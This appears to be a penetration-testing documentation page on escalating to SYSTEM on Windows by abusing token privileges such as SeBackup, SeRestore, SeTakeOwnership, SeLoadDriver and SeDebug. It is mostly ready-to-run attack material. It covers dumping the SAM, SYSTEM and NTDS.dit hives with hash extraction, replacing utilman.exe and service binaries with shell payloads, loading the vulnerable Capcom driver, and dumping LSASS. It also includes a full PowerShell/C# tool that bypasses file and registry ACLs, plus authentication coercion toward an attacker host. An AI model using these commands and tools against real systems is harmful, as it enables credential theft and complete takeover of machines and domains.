Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
Several token privileges besides SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege (covered in Potato Attacks) are enough on their own to reach SYSTEM. They are normally present but disabled in the token, so whichever tool you use has to enable them with AdjustTokenPrivileges first; and because Backup Operators and similar operator groups are stripped from UAC-filtered interactive tokens, check the token of the process you are actually running in rather than the group membership on paper.
Check Privileges
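whoami /priv lists every privilege in the current token, enabled or not. The helper below is an added example, not code from the original page: it parses that output and reports only the privileges this page covers together with their Enabled/Disabled state. A Disabled entry is still usable; it just means the tool doing the work must enable it first (a privilege that is absent from the list cannot be enabled at all).

```powershell
# Added example: flag the escalation-relevant privileges in the current token.
# Privilege names are the ones covered on this page.
$interesting = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege', 'SeBackupPrivilege',
               'SeRestorePrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege', 'SeDebugPrivilege'

function Get-DangerousPrivilege {
    # Defaults to the live token; pass captured lines to analyse output from another host.
    param([string[]]$WhoamiOutput = (whoami /priv))
    foreach ($line in $WhoamiOutput) {
        # Rows look like: "SeBackupPrivilege   Back up files and directories   Disabled"
        if ($line -match '^(Se\w+Privilege)\s+.*\s+(Enabled|Disabled)\s*$') {
            $name, $state = $Matches[1], $Matches[2]
            if ($interesting -contains $name) {
                [pscustomobject]@{ Privilege = $name; State = $state }
            }
        }
    }
}

Get-DangerousPrivilege | Format-Table -AutoSize
```

If SeBackupPrivilege is missing even though you are in Backup Operators, you are most likely in a UAC-filtered token; the same command from an elevated or non-interactive context will show it.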
SeBackupPrivilege
Read any file on the system regardless of its DACL, including the SAM and SYSTEM hives. The bypass only applies to handles opened with FILE_FLAG_BACKUP_SEMANTICS while the privilege is enabled; reg save and robocopy /B do both for you, a plain copy or type does not.
Dump SAM & SYSTEM
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
Read Protected Files via robocopy
robocopy /B C:\Users\Administrator\Desktop C:\Temp report.txt
Read NTDS.dit (Domain Controller)
The live ntds.dit is held open by LSASS, so copy it out of a volume shadow copy. Create script.txt:
set context persistent nowriters
add volume C: alias myvolume
create
expose %myvolume% Z:
diskshadow /s script.txt
robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
Extract (SYSTEM is the hive saved with reg save above; it holds the boot key needed to decrypt the hashes):
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
SeRestorePrivilege
Write any file on the system regardless of its DACL, including TrustedInstaller-owned binaries under System32. As with SeBackupPrivilege, the privilege must be enabled in the token and the destination opened with backup semantics; robocopy /B does both itself, while a plain copy may still get Access denied even though the privilege is held.
Replace System Binary
copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.exe.bak
copy cmd.exe C:\Windows\System32\utilman.exe
Lock the screen (Win+L) and click Ease of Access: the renamed cmd.exe starts as SYSTEM on the logon desktop.
Write to Protected Directories
# Enable privilege
Import-Module .\EnableSeRestorePrivilege.ps1
# Write payload
copy shell.dll C:\Windows\System32\target.dll
SeTakeOwnershipPrivilege
Take ownership of any object (file, directory, registry key, service) even when the DACL denies you; an owner implicitly holds WRITE_DAC, so you then grant yourself whatever access you need. takeown.exe enables the privilege itself. The owner change (usually away from TrustedInstaller) is easy to spot in the ACL, so expect it to be noticed on a monitored host.
Take Ownership of File
takeown /f "C:\Windows\System32\config\SAM"
icacls "C:\Windows\System32\config\SAM" /grant %USERNAME%:F
The live SAM hive is held open exclusively by the kernel, so a plain copy of it still fails even with Full control; take the file from a volume shadow copy instead (diskshadow steps above), where the ACL you just set applies:
copy Z:\Windows\System32\config\SAM C:\Temp\
Take Ownership of Registry Key
takeown.exe only handles files and directories and rejects a registry path. For a key, open it with the TakeOwnership (WRITE_OWNER) access right, which the enabled privilege grants regardless of the DACL, set the owner through the .NET RegistryKey/RegistrySecurity API (or a tool such as SetACL with -ot reg), then grant yourself FullControl as the new owner. A typical target is a service key such as HKLM\SYSTEM\CurrentControlSet\Services\VulnService, whose ImagePath you can then point at your own binary.
Take Ownership of Service Binary
takeown /f "C:\Program Files\Service\app.exe"
icacls "C:\Program Files\Service\app.exe" /grant %USERNAME%:F
copy shell.exe "C:\Program Files\Service\app.exe"
The payload runs with the service account only once the service restarts; file rights alone do not let you stop or start it, so restart it if your account can, or wait for a reboot.
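The mechanics behind the SeBackupPrivilege, SeRestorePrivilege and SeTakeOwnershipPrivilege sections above, as one added example that is not code from the original page: a P/Invoke helper that enables a privilege with AdjustTokenPrivileges (the same call EnableSeRestorePrivilege.ps1 relies on), a file copy that opens source and destination with FILE_FLAG_BACKUP_SEMANTICS so the DACL is bypassed, and a registry take-ownership that does for a key what takeown.exe does for a file. The class name Priv, the function names, the file paths and the VulnService key are assumptions for illustration.

```powershell
# Added example: enable a privilege and use it the way the kernel expects.
# SeBackup/SeRestore bypass a DACL only for handles opened with FILE_FLAG_BACKUP_SEMANTICS;
# SeTakeOwnership grants WRITE_OWNER on any object once it is enabled.
$src = @'
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;

public static class Priv {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint Count; public LUID Luid; public uint Attr; }

    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr tok);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool AdjustTokenPrivileges(IntPtr tok, bool disableAll, ref TOKEN_PRIVILEGES state, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] static extern SafeFileHandle CreateFile(string path, uint access, uint share, IntPtr sa, uint disp, uint flags, IntPtr tmpl);

    const uint TOKEN_ADJUST_PRIVILEGES = 0x20, TOKEN_QUERY = 0x08, SE_PRIVILEGE_ENABLED = 0x02;
    const uint GENERIC_READ = 0x80000000, GENERIC_WRITE = 0x40000000, FILE_SHARE_READ = 1;
    const uint OPEN_EXISTING = 3, CREATE_ALWAYS = 2, FILE_FLAG_BACKUP_SEMANTICS = 0x02000000;
    const int ERROR_NOT_ALL_ASSIGNED = 1300;

    // Enable one privilege in the current process token. It must already be listed by
    // whoami /priv: AdjustTokenPrivileges can only toggle privileges, never add them.
    public static bool Enable(string name) {
        IntPtr tok;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out tok)) return false;
        try {
            LUID luid;
            if (!LookupPrivilegeValue(null, name, out luid)) return false;
            TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES { Count = 1, Luid = luid, Attr = SE_PRIVILEGE_ENABLED };
            bool ok = AdjustTokenPrivileges(tok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
            // The call returns TRUE even when the privilege is not held; the last error tells the truth.
            return ok && Marshal.GetLastWin32Error() != ERROR_NOT_ALL_ASSIGNED;
        } finally { CloseHandle(tok); }
    }
    // Read handle with backup semantics: with SeBackupPrivilege enabled the DACL is not consulted.
    public static SafeFileHandle OpenBackup(string path) {
        return CreateFile(path, GENERIC_READ, FILE_SHARE_READ, IntPtr.Zero, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero);
    }
    // Write handle with backup semantics: with SeRestorePrivilege enabled the DACL is not consulted.
    public static SafeFileHandle OpenRestore(string path) {
        return CreateFile(path, GENERIC_WRITE, 0, IntPtr.Zero, CREATE_ALWAYS, FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero);
    }
}
'@
Add-Type -TypeDefinition $src

function Copy-WithBackupSemantics {
    param([string]$Source, [string]$Destination)
    foreach ($p in 'SeBackupPrivilege', 'SeRestorePrivilege') {
        if (-not [Priv]::Enable($p)) { throw "$p is not in this token" }
    }
    $hIn = [Priv]::OpenBackup($Source)
    if ($hIn.IsInvalid) { throw "open $Source failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    $hOut = [Priv]::OpenRestore($Destination)
    if ($hOut.IsInvalid) { throw "create $Destination failed, error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    $rs = New-Object IO.FileStream($hIn, [IO.FileAccess]::Read)
    $ws = New-Object IO.FileStream($hOut, [IO.FileAccess]::Write)
    try { $rs.CopyTo($ws) } finally { $ws.Dispose(); $rs.Dispose() }
}

function Take-RegistryKey {
    # Take ownership of an HKLM subkey, then grant the current user FullControl on it.
    param([string]$SubKey)
    if (-not [Priv]::Enable('SeTakeOwnershipPrivilege')) { throw 'SeTakeOwnershipPrivilege is not in this token' }
    $me = [Security.Principal.WindowsIdentity]::GetCurrent().User
    $hklm = [Microsoft.Win32.Registry]::LocalMachine
    $check = [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree
    # Step 1: ask only for WRITE_OWNER; with the privilege enabled it is granted regardless of the DACL.
    $key = $hklm.OpenSubKey($SubKey, $check, [Security.AccessControl.RegistryRights]::TakeOwnership)
    $sd = New-Object Security.AccessControl.RegistrySecurity
    $sd.SetOwner($me)
    $key.SetAccessControl($sd)
    $key.Close()
    # Step 2: the owner implicitly holds READ_CONTROL and WRITE_DAC, so the DACL can now be rewritten.
    $rights = [Security.AccessControl.RegistryRights]'ChangePermissions, ReadPermissions'
    $key = $hklm.OpenSubKey($SubKey, $check, $rights)
    $sd = $key.GetAccessControl([Security.AccessControl.AccessControlSections]::Access)
    $sd.AddAccessRule((New-Object Security.AccessControl.RegistryAccessRule($me, 'FullControl', 'ContainerInherit', 'None', 'Allow')))
    $key.SetAccessControl($sd)
    $key.Close()
}

# Assumed sample targets for illustration, not from the original page's environment.
Copy-WithBackupSemantics 'C:\Users\Administrator\Desktop\root.txt' 'C:\Temp\root.txt'
Take-RegistryKey 'SYSTEM\CurrentControlSet\Services\VulnService'
```

Two details matter in practice. AdjustTokenPrivileges reports success even when the privilege is not in the token, so the ERROR_NOT_ALL_ASSIGNED check is what tells you the privilege is really held. And the backup-semantics copy still cannot read a file the kernel holds open exclusively (the live SAM or ntds.dit), which is why those go through reg save or a shadow copy.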
SeLoadDriverPrivilege
Load kernel drivers via NtLoadDriver. A known-vulnerable signed driver gives arbitrary kernel read/write and from there code execution. The privilege must be enabled in the token, and NtLoadDriver needs a service registry key whose ImagePath points at the .sys file; since an unprivileged user cannot write under HKLM\SYSTEM, the usual trick (tools such as EoPLoadDriver) creates the key under the caller's own HKCU hive and passes the \Registry\User\<SID>\... path instead. On current Windows the Microsoft vulnerable driver blocklist and HVCI refuse Capcom.sys, so expect this to work only on older or loosely configured hosts.
https://github.com/FuzzySecurity/Capcom-Rootkit/
# Load driver
LoadDriver.exe System\CurrentControlSet\Capcom C:\Temp\Capcom.sys
# Exploit
ExploitCapcom.exe
SeDebugPrivilege
Open any process with full access regardless of its DACL (protected processes such as lsass under RunAsPPL remain off limits). Migrate into, or spawn a child of, a SYSTEM process such as winlogon; a child process inherits the parent's primary token.
Migrate via Meterpreter
meterpreter > ps
meterpreter > migrate <SYSTEM_PID>
Dump LSASS (fails when LSA Protection is on: a PPL process cannot be opened with PROCESS_VM_READ even by a SeDebugPrivilege holder)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Named Pipe Impersonation
Create a named pipe, trick a privileged process into connecting, then impersonate the client's token on the server thread. Two conditions apply: the client must connect with an impersonation level of at least Impersonation (the default for a named pipe client unless it asks for SECURITY_IDENTIFICATION), and the server needs SeImpersonatePrivilege to use another user's token above Identification level. This is therefore the primitive the Potato family is built on, not a way around that privilege.
PowerShell PoC
$pipe = New-Object System.IO.Pipes.NamedPipeServerStream("pwned", [System.IO.Pipes.PipeDirection]::InOut)
# Blocks until a client opens \\.\pipe\pwned
$pipe.WaitForConnection()
# Impersonate the client on this thread. Do not test with whoami.exe here: a new process gets the
# process's primary token, not the thread's impersonation token, so it would show the original user.
$pipe.RunAsClient({ Write-Host "Impersonating: $([System.Security.Principal.WindowsIdentity]::GetCurrent().Name)" })
$pipe.Dispose()
SpoolSample / PetitPotam
Coerce the target's machine account into authenticating to an attacker-controlled host (the connection lands on the attacker's SMB listener, i.e. a named pipe endpoint, where it can be captured or relayed):
# SpoolSample (print spooler)
SpoolSample.exe TARGET ATTACKER
# PetitPotam (EFS)
python3 PetitPotam.py ATTACKER TARGET
Capture with Responder or relay with ntlmrelayx. A machine-account NetNTLM hash is not practically crackable, so the value is in relaying (for example to LDAP or to AD CS web enrollment); relays to SMB fail wherever SMB signing is enforced.
Quick Reference
| Privilege | What You Can Do |
|---|---|
| SeImpersonatePrivilege | Potato attacks → SYSTEM |
| SeBackupPrivilege | Read any file (SAM, NTDS.dit) |
| SeRestorePrivilege | Write any file (replace binaries) |
| SeTakeOwnershipPrivilege | Own any object → modify ACLs |
| SeLoadDriverPrivilege | Load kernel driver → kernel exec |
| SeDebugPrivilege | Attach to SYSTEM process |
| SeAssignPrimaryTokenPrivilege | Potato attacks → SYSTEM |